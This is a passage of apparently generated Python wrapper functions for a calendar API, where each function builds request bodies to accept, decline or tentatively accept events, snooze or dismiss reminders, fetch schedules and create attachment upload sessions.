event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendargroupscalendarscalendarviewinstance_tentatively_accept(client,
user_id,
calendar_group_id,
calendar_id,
event_id,
event_id1,
comment=None,
send_response=None):
body = {}
if comment is not None:
body['comment'] = comment
if send_response is not None:
body['send_response'] = send_response
else:
body['send_response'] = False
return client.tentatively_accept(user_id=user_id,
calendar_group_id=calendar_group_id,
calendar_id=calendar_id,
event_id=event_id,
event_id1=event_id1,
body=body)
def usersactions_userscalendargroupscalendarscalendarview_accept(
        client, user_id, calendar_group_id, calendar_id,
        event_id, comment=None, send_response=None):
    """Build the accept body (``send_response`` defaults to False) and call ``client.accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.accept(user_id=user_id, calendar_group_id=calendar_group_id,
                         calendar_id=calendar_id, event_id=event_id, body=payload)
def usersactions_userscalendargroupscalendarscalendarview_decline(
        client, user_id, calendar_group_id, calendar_id,
        event_id, comment=None, send_response=None):
    """Build the decline body (``send_response`` defaults to False) and call ``client.decline``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.decline(user_id=user_id, calendar_group_id=calendar_group_id,
                          calendar_id=calendar_id, event_id=event_id, body=payload)
def usersactions_userscalendargroupscalendarscalendarview_dismiss_reminder(
        client, user_id, calendar_group_id, calendar_id, event_id):
    """Forward the route parameters to ``client.dismiss_reminder``."""
    route = {'user_id': user_id, 'calendar_group_id': calendar_group_id,
             'calendar_id': calendar_id, 'event_id': event_id}
    return client.dismiss_reminder(**route)
def usersactions_userscalendargroupscalendarscalendarview_snooze_reminder(
        client, user_id, calendar_group_id, calendar_id,
        event_id, new_reminder_time=None):
    """Build the optional ``new_reminder_time`` body and call ``client.snooze_reminder``."""
    payload = {} if new_reminder_time is None else {'new_reminder_time': new_reminder_time}
    return client.snooze_reminder(user_id=user_id, calendar_group_id=calendar_group_id,
                                  calendar_id=calendar_id, event_id=event_id,
                                  body=payload)
def usersactions_userscalendargroupscalendarscalendarview_tentatively_accept(
        client, user_id, calendar_group_id, calendar_id,
        event_id, comment=None, send_response=None):
    """Build the response body (``send_response`` defaults to False) and call ``client.tentatively_accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.tentatively_accept(user_id=user_id, calendar_group_id=calendar_group_id,
                                     calendar_id=calendar_id, event_id=event_id,
                                     body=payload)
def usersactions_userscalendargroupscalendarseventsattachment_create_upload_session(
        client, user_id, calendar_group_id, calendar_id,
        event_id, attachment_item=None):
    """Build the optional ``attachment_item`` body and call ``client.create_upload_session``."""
    payload = {} if attachment_item is None else {'attachment_item': attachment_item}
    return client.create_upload_session(user_id=user_id,
                                        calendar_group_id=calendar_group_id,
                                        calendar_id=calendar_id,
                                        event_id=event_id, body=payload)
def usersactions_userscalendargroupscalendarseventscalendar_get_schedule(
        client, user_id, calendar_group_id, calendar_id, event_id,
        schedules=None, end_time=None, start_time=None,
        availability_view_interval=None):
    """Collect the non-None query fields into a body and call ``client.get_schedule``."""
    fields = (('schedules', schedules), ('end_time', end_time),
              ('start_time', start_time),
              ('availability_view_interval', availability_view_interval))
    payload = {key: value for key, value in fields if value is not None}
    return client.get_schedule(user_id=user_id, calendar_group_id=calendar_group_id,
                               calendar_id=calendar_id, event_id=event_id,
                               body=payload)
def usersactions_userscalendargroupscalendarseventsinstance_accept(
        client, user_id, calendar_group_id, calendar_id,
        event_id, event_id1, comment=None, send_response=None):
    """Build the accept body (``send_response`` defaults to False) and call ``client.accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.accept(user_id=user_id, calendar_group_id=calendar_group_id,
                         calendar_id=calendar_id, event_id=event_id,
                         event_id1=event_id1, body=payload)
def usersactions_userscalendargroupscalendarseventsinstance_decline(
        client, user_id, calendar_group_id, calendar_id,
        event_id, event_id1, comment=None, send_response=None):
    """Build the decline body (``send_response`` defaults to False) and call ``client.decline``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.decline(user_id=user_id, calendar_group_id=calendar_group_id,
                          calendar_id=calendar_id, event_id=event_id,
                          event_id1=event_id1, body=payload)
def usersactions_userscalendargroupscalendarseventsinstance_dismiss_reminder(
        client, user_id, calendar_group_id, calendar_id, event_id, event_id1):
    """Forward the route parameters to ``client.dismiss_reminder``."""
    route = {'user_id': user_id, 'calendar_group_id': calendar_group_id,
             'calendar_id': calendar_id, 'event_id': event_id,
             'event_id1': event_id1}
    return client.dismiss_reminder(**route)
def usersactions_userscalendargroupscalendarseventsinstance_snooze_reminder(
        client, user_id, calendar_group_id, calendar_id,
        event_id, event_id1, new_reminder_time=None):
    """Build the optional ``new_reminder_time`` body and call ``client.snooze_reminder``."""
    payload = {} if new_reminder_time is None else {'new_reminder_time': new_reminder_time}
    return client.snooze_reminder(user_id=user_id, calendar_group_id=calendar_group_id,
                                  calendar_id=calendar_id, event_id=event_id,
                                  event_id1=event_id1, body=payload)
def usersactions_userscalendargroupscalendarseventsinstance_tentatively_accept(
        client, user_id, calendar_group_id, calendar_id,
        event_id, event_id1, comment=None, send_response=None):
    """Build the response body (``send_response`` defaults to False) and call ``client.tentatively_accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.tentatively_accept(user_id=user_id, calendar_group_id=calendar_group_id,
                                     calendar_id=calendar_id, event_id=event_id,
                                     event_id1=event_id1, body=payload)
def usersactions_userscalendargroupscalendarsevent_accept(
        client, user_id, calendar_group_id, calendar_id,
        event_id, comment=None, send_response=None):
    """Build the accept body (``send_response`` defaults to False) and call ``client.accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.accept(user_id=user_id, calendar_group_id=calendar_group_id,
                         calendar_id=calendar_id, event_id=event_id, body=payload)
def usersactions_userscalendargroupscalendarsevent_decline(
        client, user_id, calendar_group_id, calendar_id,
        event_id, comment=None, send_response=None):
    """Build the decline body (``send_response`` defaults to False) and call ``client.decline``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.decline(user_id=user_id, calendar_group_id=calendar_group_id,
                          calendar_id=calendar_id, event_id=event_id, body=payload)
def usersactions_userscalendargroupscalendarsevent_dismiss_reminder(
        client, user_id, calendar_group_id, calendar_id, event_id):
    """Forward the route parameters to ``client.dismiss_reminder``."""
    route = {'user_id': user_id, 'calendar_group_id': calendar_group_id,
             'calendar_id': calendar_id, 'event_id': event_id}
    return client.dismiss_reminder(**route)
def usersactions_userscalendargroupscalendarsevent_snooze_reminder(
        client, user_id, calendar_group_id, calendar_id,
        event_id, new_reminder_time=None):
    """Build the optional ``new_reminder_time`` body and call ``client.snooze_reminder``."""
    payload = {} if new_reminder_time is None else {'new_reminder_time': new_reminder_time}
    return client.snooze_reminder(user_id=user_id, calendar_group_id=calendar_group_id,
                                  calendar_id=calendar_id, event_id=event_id,
                                  body=payload)
def usersactions_userscalendargroupscalendarsevent_tentatively_accept(
        client, user_id, calendar_group_id, calendar_id,
        event_id, comment=None, send_response=None):
    """Build the response body (``send_response`` defaults to False) and call ``client.tentatively_accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.tentatively_accept(user_id=user_id, calendar_group_id=calendar_group_id,
                                     calendar_id=calendar_id, event_id=event_id,
                                     body=payload)
def usersactions_userscalendargroupscalendar_get_schedule(
        client, user_id, calendar_group_id, calendar_id,
        schedules=None, end_time=None, start_time=None,
        availability_view_interval=None):
    """Collect the non-None query fields into a body and call ``client.get_schedule``."""
    fields = (('schedules', schedules), ('end_time', end_time),
              ('start_time', start_time),
              ('availability_view_interval', availability_view_interval))
    payload = {key: value for key, value in fields if value is not None}
    return client.get_schedule(user_id=user_id, calendar_group_id=calendar_group_id,
                               calendar_id=calendar_id, body=payload)
def usersactions_userscalendarscalendarviewattachment_create_upload_session(
        client, user_id, calendar_id, event_id, attachment_item=None):
    """Build the optional ``attachment_item`` body and call ``client.create_upload_session``."""
    payload = {} if attachment_item is None else {'attachment_item': attachment_item}
    return client.create_upload_session(user_id=user_id, calendar_id=calendar_id,
                                        event_id=event_id, body=payload)
def usersactions_userscalendarscalendarviewcalendar_get_schedule(
        client, user_id, calendar_id, event_id,
        schedules=None, end_time=None, start_time=None,
        availability_view_interval=None):
    """Collect the non-None query fields into a body and call ``client.get_schedule``."""
    fields = (('schedules', schedules), ('end_time', end_time),
              ('start_time', start_time),
              ('availability_view_interval', availability_view_interval))
    payload = {key: value for key, value in fields if value is not None}
    return client.get_schedule(user_id=user_id, calendar_id=calendar_id,
                               event_id=event_id, body=payload)
def usersactions_userscalendarscalendarviewinstance_accept(
        client, user_id, calendar_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the accept body (``send_response`` defaults to False) and call ``client.accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.accept(user_id=user_id, calendar_id=calendar_id,
                         event_id=event_id, event_id1=event_id1, body=payload)
def usersactions_userscalendarscalendarviewinstance_decline(
        client, user_id, calendar_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the decline body (``send_response`` defaults to False) and call ``client.decline``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.decline(user_id=user_id, calendar_id=calendar_id,
                          event_id=event_id, event_id1=event_id1, body=payload)
def usersactions_userscalendarscalendarviewinstance_dismiss_reminder(
        client, user_id, calendar_id, event_id, event_id1):
    """Forward the route parameters to ``client.dismiss_reminder``."""
    route = {'user_id': user_id, 'calendar_id': calendar_id,
             'event_id': event_id, 'event_id1': event_id1}
    return client.dismiss_reminder(**route)
def usersactions_userscalendarscalendarviewinstance_snooze_reminder(
        client, user_id, calendar_id, event_id, event_id1,
        new_reminder_time=None):
    """Build the optional ``new_reminder_time`` body and call ``client.snooze_reminder``."""
    payload = {} if new_reminder_time is None else {'new_reminder_time': new_reminder_time}
    return client.snooze_reminder(user_id=user_id, calendar_id=calendar_id,
                                  event_id=event_id, event_id1=event_id1,
                                  body=payload)
def usersactions_userscalendarscalendarviewinstance_tentatively_accept(
        client, user_id, calendar_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the response body (``send_response`` defaults to False) and call ``client.tentatively_accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.tentatively_accept(user_id=user_id, calendar_id=calendar_id,
                                     event_id=event_id, event_id1=event_id1,
                                     body=payload)
def usersactions_userscalendarscalendarview_accept(
        client, user_id, calendar_id, event_id,
        comment=None, send_response=None):
    """Build the accept body (``send_response`` defaults to False) and call ``client.accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.accept(user_id=user_id, calendar_id=calendar_id,
                         event_id=event_id, body=payload)
def usersactions_userscalendarscalendarview_decline(
        client, user_id, calendar_id, event_id,
        comment=None, send_response=None):
    """Build the decline body (``send_response`` defaults to False) and call ``client.decline``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.decline(user_id=user_id, calendar_id=calendar_id,
                          event_id=event_id, body=payload)
def usersactions_userscalendarscalendarview_dismiss_reminder(
        client, user_id, calendar_id, event_id):
    """Forward the route parameters to ``client.dismiss_reminder``."""
    route = {'user_id': user_id, 'calendar_id': calendar_id, 'event_id': event_id}
    return client.dismiss_reminder(**route)
def usersactions_userscalendarscalendarview_snooze_reminder(
        client, user_id, calendar_id, event_id, new_reminder_time=None):
    """Build the optional ``new_reminder_time`` body and call ``client.snooze_reminder``."""
    payload = {} if new_reminder_time is None else {'new_reminder_time': new_reminder_time}
    return client.snooze_reminder(user_id=user_id, calendar_id=calendar_id,
                                  event_id=event_id, body=payload)
def usersactions_userscalendarscalendarview_tentatively_accept(
        client, user_id, calendar_id, event_id,
        comment=None, send_response=None):
    """Build the response body (``send_response`` defaults to False) and call ``client.tentatively_accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.tentatively_accept(user_id=user_id, calendar_id=calendar_id,
                                     event_id=event_id, body=payload)
def usersactions_userscalendarseventsattachment_create_upload_session(
        client, user_id, calendar_id, event_id, attachment_item=None):
    """Build the optional ``attachment_item`` body and call ``client.create_upload_session``."""
    payload = {} if attachment_item is None else {'attachment_item': attachment_item}
    return client.create_upload_session(user_id=user_id, calendar_id=calendar_id,
                                        event_id=event_id, body=payload)
def usersactions_userscalendarseventscalendar_get_schedule(
        client, user_id, calendar_id, event_id,
        schedules=None, end_time=None, start_time=None,
        availability_view_interval=None):
    """Collect the non-None query fields into a body and call ``client.get_schedule``."""
    fields = (('schedules', schedules), ('end_time', end_time),
              ('start_time', start_time),
              ('availability_view_interval', availability_view_interval))
    payload = {key: value for key, value in fields if value is not None}
    return client.get_schedule(user_id=user_id, calendar_id=calendar_id,
                               event_id=event_id, body=payload)
def usersactions_userscalendarseventsinstance_accept(
        client, user_id, calendar_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the accept body (``send_response`` defaults to False) and call ``client.accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.accept(user_id=user_id, calendar_id=calendar_id,
                         event_id=event_id, event_id1=event_id1, body=payload)
def usersactions_userscalendarseventsinstance_decline(
        client, user_id, calendar_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the decline body (``send_response`` defaults to False) and call ``client.decline``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.decline(user_id=user_id, calendar_id=calendar_id,
                          event_id=event_id, event_id1=event_id1, body=payload)
def usersactions_userscalendarseventsinstance_dismiss_reminder(
        client, user_id, calendar_id, event_id, event_id1):
    """Forward the route parameters to ``client.dismiss_reminder``."""
    route = {'user_id': user_id, 'calendar_id': calendar_id,
             'event_id': event_id, 'event_id1': event_id1}
    return client.dismiss_reminder(**route)
def usersactions_userscalendarseventsinstance_snooze_reminder(
        client, user_id, calendar_id, event_id, event_id1,
        new_reminder_time=None):
    """Build the optional ``new_reminder_time`` body and call ``client.snooze_reminder``."""
    payload = {} if new_reminder_time is None else {'new_reminder_time': new_reminder_time}
    return client.snooze_reminder(user_id=user_id, calendar_id=calendar_id,
                                  event_id=event_id, event_id1=event_id1,
                                  body=payload)
def usersactions_userscalendarseventsinstance_tentatively_accept(
        client, user_id, calendar_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the response body (``send_response`` defaults to False) and call ``client.tentatively_accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.tentatively_accept(user_id=user_id, calendar_id=calendar_id,
                                     event_id=event_id, event_id1=event_id1,
                                     body=payload)
def usersactions_userscalendarsevent_accept(
        client, user_id, calendar_id, event_id,
        comment=None, send_response=None):
    """Build the accept body (``send_response`` defaults to False) and call ``client.accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.accept(user_id=user_id, calendar_id=calendar_id,
                         event_id=event_id, body=payload)
def usersactions_userscalendarsevent_decline(
        client, user_id, calendar_id, event_id,
        comment=None, send_response=None):
    """Build the decline body (``send_response`` defaults to False) and call ``client.decline``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.decline(user_id=user_id, calendar_id=calendar_id,
                          event_id=event_id, body=payload)
def usersactions_userscalendarsevent_dismiss_reminder(
        client, user_id, calendar_id, event_id):
    """Forward the route parameters to ``client.dismiss_reminder``."""
    route = {'user_id': user_id, 'calendar_id': calendar_id, 'event_id': event_id}
    return client.dismiss_reminder(**route)
def usersactions_userscalendarsevent_snooze_reminder(
        client, user_id, calendar_id, event_id, new_reminder_time=None):
    """Build the optional ``new_reminder_time`` body and call ``client.snooze_reminder``."""
    payload = {} if new_reminder_time is None else {'new_reminder_time': new_reminder_time}
    return client.snooze_reminder(user_id=user_id, calendar_id=calendar_id,
                                  event_id=event_id, body=payload)
def usersactions_userscalendarsevent_tentatively_accept(
        client, user_id, calendar_id, event_id,
        comment=None, send_response=None):
    """Build the response body (``send_response`` defaults to False) and call ``client.tentatively_accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.tentatively_accept(user_id=user_id, calendar_id=calendar_id,
                                     event_id=event_id, body=payload)
def usersactions_userscalendar_get_schedule(
        client, user_id, calendar_id,
        schedules=None, end_time=None, start_time=None,
        availability_view_interval=None):
    """Collect the non-None query fields into a body and call ``client.get_schedule``."""
    fields = (('schedules', schedules), ('end_time', end_time),
              ('start_time', start_time),
              ('availability_view_interval', availability_view_interval))
    payload = {key: value for key, value in fields if value is not None}
    return client.get_schedule(user_id=user_id, calendar_id=calendar_id,
                               body=payload)
def usersactions_userscalendarviewattachment_create_upload_session(
        client, user_id, event_id, attachment_item=None):
    """Build the optional ``attachment_item`` body and call ``client.create_upload_session``."""
    payload = {} if attachment_item is None else {'attachment_item': attachment_item}
    return client.create_upload_session(user_id=user_id, event_id=event_id,
                                        body=payload)
def usersactions_userscalendarviewcalendarview_accept(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the accept body (``send_response`` defaults to False) and call ``client.accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.accept(user_id=user_id, event_id=event_id,
                         event_id1=event_id1, body=payload)
def usersactions_userscalendarviewcalendarview_decline(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the decline body (``send_response`` defaults to False) and call ``client.decline``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.decline(user_id=user_id, event_id=event_id,
                          event_id1=event_id1, body=payload)
def usersactions_userscalendarviewcalendarview_dismiss_reminder(
        client, user_id, event_id, event_id1):
    """Forward the route parameters to ``client.dismiss_reminder``."""
    route = {'user_id': user_id, 'event_id': event_id, 'event_id1': event_id1}
    return client.dismiss_reminder(**route)
def usersactions_userscalendarviewcalendarview_snooze_reminder(
        client, user_id, event_id, event_id1, new_reminder_time=None):
    """Build the optional ``new_reminder_time`` body and call ``client.snooze_reminder``."""
    payload = {} if new_reminder_time is None else {'new_reminder_time': new_reminder_time}
    return client.snooze_reminder(user_id=user_id, event_id=event_id,
                                  event_id1=event_id1, body=payload)
def usersactions_userscalendarviewcalendarview_tentatively_accept(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the response body (``send_response`` defaults to False) and call ``client.tentatively_accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.tentatively_accept(user_id=user_id, event_id=event_id,
                                     event_id1=event_id1, body=payload)
def usersactions_userscalendarviewcalendarevent_accept(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the accept body (``send_response`` defaults to False) and call ``client.accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.accept(user_id=user_id, event_id=event_id,
                         event_id1=event_id1, body=payload)
def usersactions_userscalendarviewcalendarevent_decline(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the decline body (``send_response`` defaults to False) and call ``client.decline``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.decline(user_id=user_id, event_id=event_id,
                          event_id1=event_id1, body=payload)
def usersactions_userscalendarviewcalendarevent_dismiss_reminder(
        client, user_id, event_id, event_id1):
    """Forward the route parameters to ``client.dismiss_reminder``."""
    route = {'user_id': user_id, 'event_id': event_id, 'event_id1': event_id1}
    return client.dismiss_reminder(**route)
def usersactions_userscalendarviewcalendarevent_snooze_reminder(
        client, user_id, event_id, event_id1, new_reminder_time=None):
    """Build the optional ``new_reminder_time`` body and call ``client.snooze_reminder``."""
    payload = {} if new_reminder_time is None else {'new_reminder_time': new_reminder_time}
    return client.snooze_reminder(user_id=user_id, event_id=event_id,
                                  event_id1=event_id1, body=payload)
def usersactions_userscalendarviewcalendarevent_tentatively_accept(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the response body (``send_response`` defaults to False) and call ``client.tentatively_accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.tentatively_accept(user_id=user_id, event_id=event_id,
                                     event_id1=event_id1, body=payload)
def usersactions_userscalendarviewcalendar_get_schedule(
        client, user_id, event_id,
        schedules=None, end_time=None, start_time=None,
        availability_view_interval=None):
    """Collect the non-None query fields into a body and call ``client.get_schedule``."""
    fields = (('schedules', schedules), ('end_time', end_time),
              ('start_time', start_time),
              ('availability_view_interval', availability_view_interval))
    payload = {key: value for key, value in fields if value is not None}
    return client.get_schedule(user_id=user_id, event_id=event_id, body=payload)
def usersactions_userscalendarviewinstance_accept(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the accept body (``send_response`` defaults to False) and call ``client.accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.accept(user_id=user_id, event_id=event_id,
                         event_id1=event_id1, body=payload)
def usersactions_userscalendarviewinstance_decline(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the decline body (``send_response`` defaults to False) and call ``client.decline``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.decline(user_id=user_id, event_id=event_id,
                          event_id1=event_id1, body=payload)
def usersactions_userscalendarviewinstance_dismiss_reminder(
        client, user_id, event_id, event_id1):
    """Forward the route parameters to ``client.dismiss_reminder``."""
    route = {'user_id': user_id, 'event_id': event_id, 'event_id1': event_id1}
    return client.dismiss_reminder(**route)
def usersactions_userscalendarviewinstance_snooze_reminder(
        client, user_id, event_id, event_id1, new_reminder_time=None):
    """Build the optional ``new_reminder_time`` body and call ``client.snooze_reminder``."""
    payload = {} if new_reminder_time is None else {'new_reminder_time': new_reminder_time}
    return client.snooze_reminder(user_id=user_id, event_id=event_id,
                                  event_id1=event_id1, body=payload)
def usersactions_userscalendarviewinstance_tentatively_accept(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the response body (``send_response`` defaults to False) and call ``client.tentatively_accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.tentatively_accept(user_id=user_id, event_id=event_id,
                                     event_id1=event_id1, body=payload)
def usersactions_userscalendarview_accept(
        client, user_id, event_id, comment=None, send_response=None):
    """Build the accept body (``send_response`` defaults to False) and call ``client.accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.accept(user_id=user_id, event_id=event_id, body=payload)
def usersactions_userscalendarview_decline(
        client, user_id, event_id, comment=None, send_response=None):
    """Build the decline body (``send_response`` defaults to False) and call ``client.decline``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.decline(user_id=user_id, event_id=event_id, body=payload)
def usersactions_userscalendarview_dismiss_reminder(client, user_id, event_id):
    """Forward the route parameters to ``client.dismiss_reminder``."""
    route = {'user_id': user_id, 'event_id': event_id}
    return client.dismiss_reminder(**route)
def usersactions_userscalendarview_snooze_reminder(
        client, user_id, event_id, new_reminder_time=None):
    """Build the optional ``new_reminder_time`` body and call ``client.snooze_reminder``."""
    payload = {} if new_reminder_time is None else {'new_reminder_time': new_reminder_time}
    return client.snooze_reminder(user_id=user_id, event_id=event_id, body=payload)
def usersactions_userscalendarview_tentatively_accept(
        client, user_id, event_id, comment=None, send_response=None):
    """Build the response body (``send_response`` defaults to False) and call ``client.tentatively_accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.tentatively_accept(user_id=user_id, event_id=event_id,
                                     body=payload)
def usersactions_userseventsattachment_create_upload_session(
        client, user_id, event_id, attachment_item=None):
    """Build the optional ``attachment_item`` body and call ``client.create_upload_session``."""
    payload = {} if attachment_item is None else {'attachment_item': attachment_item}
    return client.create_upload_session(user_id=user_id, event_id=event_id,
                                        body=payload)
def usersactions_userseventscalendarview_accept(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the accept body (``send_response`` defaults to False) and call ``client.accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.accept(user_id=user_id, event_id=event_id,
                         event_id1=event_id1, body=payload)
def usersactions_userseventscalendarview_decline(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the decline body (``send_response`` defaults to False) and call ``client.decline``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.decline(user_id=user_id, event_id=event_id,
                          event_id1=event_id1, body=payload)
def usersactions_userseventscalendarview_dismiss_reminder(
        client, user_id, event_id, event_id1):
    """Forward the route parameters to ``client.dismiss_reminder``."""
    route = {'user_id': user_id, 'event_id': event_id, 'event_id1': event_id1}
    return client.dismiss_reminder(**route)
def usersactions_userseventscalendarview_snooze_reminder(
        client, user_id, event_id, event_id1, new_reminder_time=None):
    """Build the optional ``new_reminder_time`` body and call ``client.snooze_reminder``."""
    payload = {} if new_reminder_time is None else {'new_reminder_time': new_reminder_time}
    return client.snooze_reminder(user_id=user_id, event_id=event_id,
                                  event_id1=event_id1, body=payload)
def usersactions_userseventscalendarview_tentatively_accept(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the response body (``send_response`` defaults to False) and call ``client.tentatively_accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.tentatively_accept(user_id=user_id, event_id=event_id,
                                     event_id1=event_id1, body=payload)
def usersactions_userseventscalendarevent_accept(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the accept body (``send_response`` defaults to False) and call ``client.accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.accept(user_id=user_id, event_id=event_id,
                         event_id1=event_id1, body=payload)
def usersactions_userseventscalendarevent_decline(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the decline body (``send_response`` defaults to False) and call ``client.decline``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.decline(user_id=user_id, event_id=event_id,
                          event_id1=event_id1, body=payload)
def usersactions_userseventscalendarevent_dismiss_reminder(
        client, user_id, event_id, event_id1):
    """Forward the route parameters to ``client.dismiss_reminder``."""
    route = {'user_id': user_id, 'event_id': event_id, 'event_id1': event_id1}
    return client.dismiss_reminder(**route)
def usersactions_userseventscalendarevent_snooze_reminder(
        client, user_id, event_id, event_id1, new_reminder_time=None):
    """Build the optional ``new_reminder_time`` body and call ``client.snooze_reminder``."""
    payload = {} if new_reminder_time is None else {'new_reminder_time': new_reminder_time}
    return client.snooze_reminder(user_id=user_id, event_id=event_id,
                                  event_id1=event_id1, body=payload)
def usersactions_userseventscalendarevent_tentatively_accept(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the response body (``send_response`` defaults to False) and call ``client.tentatively_accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.tentatively_accept(user_id=user_id, event_id=event_id,
                                     event_id1=event_id1, body=payload)
def usersactions_userseventscalendar_get_schedule(
        client, user_id, event_id,
        schedules=None, end_time=None, start_time=None,
        availability_view_interval=None):
    """Collect the non-None query fields into a body and call ``client.get_schedule``."""
    fields = (('schedules', schedules), ('end_time', end_time),
              ('start_time', start_time),
              ('availability_view_interval', availability_view_interval))
    payload = {key: value for key, value in fields if value is not None}
    return client.get_schedule(user_id=user_id, event_id=event_id, body=payload)
def usersactions_userseventsinstance_accept(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the accept body (``send_response`` defaults to False) and call ``client.accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.accept(user_id=user_id, event_id=event_id,
                         event_id1=event_id1, body=payload)
def usersactions_userseventsinstance_decline(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the decline body (``send_response`` defaults to False) and call ``client.decline``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.decline(user_id=user_id, event_id=event_id,
                          event_id1=event_id1, body=payload)
def usersactions_userseventsinstance_dismiss_reminder(
        client, user_id, event_id, event_id1):
    """Forward the route parameters to ``client.dismiss_reminder``."""
    route = {'user_id': user_id, 'event_id': event_id, 'event_id1': event_id1}
    return client.dismiss_reminder(**route)
def usersactions_userseventsinstance_snooze_reminder(
        client, user_id, event_id, event_id1, new_reminder_time=None):
    """Build the optional ``new_reminder_time`` body and call ``client.snooze_reminder``."""
    payload = {} if new_reminder_time is None else {'new_reminder_time': new_reminder_time}
    return client.snooze_reminder(user_id=user_id, event_id=event_id,
                                  event_id1=event_id1, body=payload)
def usersactions_userseventsinstance_tentatively_accept(
        client, user_id, event_id, event_id1,
        comment=None, send_response=None):
    """Build the response body (``send_response`` defaults to False) and call ``client.tentatively_accept``."""
    payload = {'comment': comment} if comment is not None else {}
    payload['send_response'] = send_response if send_response is not None else False
    return client.tentatively_accept(user_id=user_id, event_id=event_id,
                                     event_id1=event_id1, body=payload)
def usersactions_usersevent_accept(
        client, user_id, event_id, comment=None, send_response=None):
